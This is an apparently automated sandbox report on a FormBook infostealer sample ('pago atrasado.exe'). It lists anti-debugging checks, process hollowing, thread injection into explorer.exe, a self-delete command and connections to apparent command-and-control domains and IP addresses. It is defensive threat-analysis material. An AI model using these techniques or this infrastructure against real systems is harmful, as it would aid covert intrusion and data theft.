Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04548794 mov eax, dword ptr fs:[00000030h] 16_2_04548794
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\pago atrasado.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00409B30 LdrLoadDll, 1_2_00409B30
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10009B50 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10009B50

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.crisisinterventionadvocates.com
Source: C:\Windows\explorer.exe Domain query: www.ttemola.com
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.27 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 46.101.121.244 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 74.208.236.134 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.baybeg.com
Source: C:\Windows\explorer.exe Domain query: www.everythangbutwhite.com
Source: C:\Windows\explorer.exe Domain query: www.highvizpeople.com
Source: C:\Windows\explorer.exe Domain query: www.itskosi.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.oddanimalsink.com
Source: C:\Windows\explorer.exe Domain query: www.ishhs.xyz
Source: C:\Windows\explorer.exe Domain query: www.sfcn-dng.com
Source: C:\Windows\explorer.exe Domain query: www.umgaleloacademy.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\pago atrasado.exe Section unmapped: C:\Windows\SysWOW64\colorcpl.exe base address: E0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Section loaded: unknown target: C:\Windows\SysWOW64\colorcpl.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\pago atrasado.exe Memory written: C:\Users\user\Desktop\pago atrasado.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\pago atrasado.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\pago atrasado.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Users\user\Desktop\pago atrasado.exe Thread register set: target process: 3472 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Thread register set: target process: 3472 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\pago atrasado.exe Process created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe' Jump to behavior
Source: explorer.exe, 00000002.00000000.275805694.00000000089FF000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000002.00000000.281510605.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.281960275.0000000001640000.00000002.00020000.sdmp, colorcpl.exe, 00000010.00000002.515316655.0000000002DC0000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_100098CF cpuid 0_2_100098CF
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_10012E00 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_10012E00
Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_004030FB

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs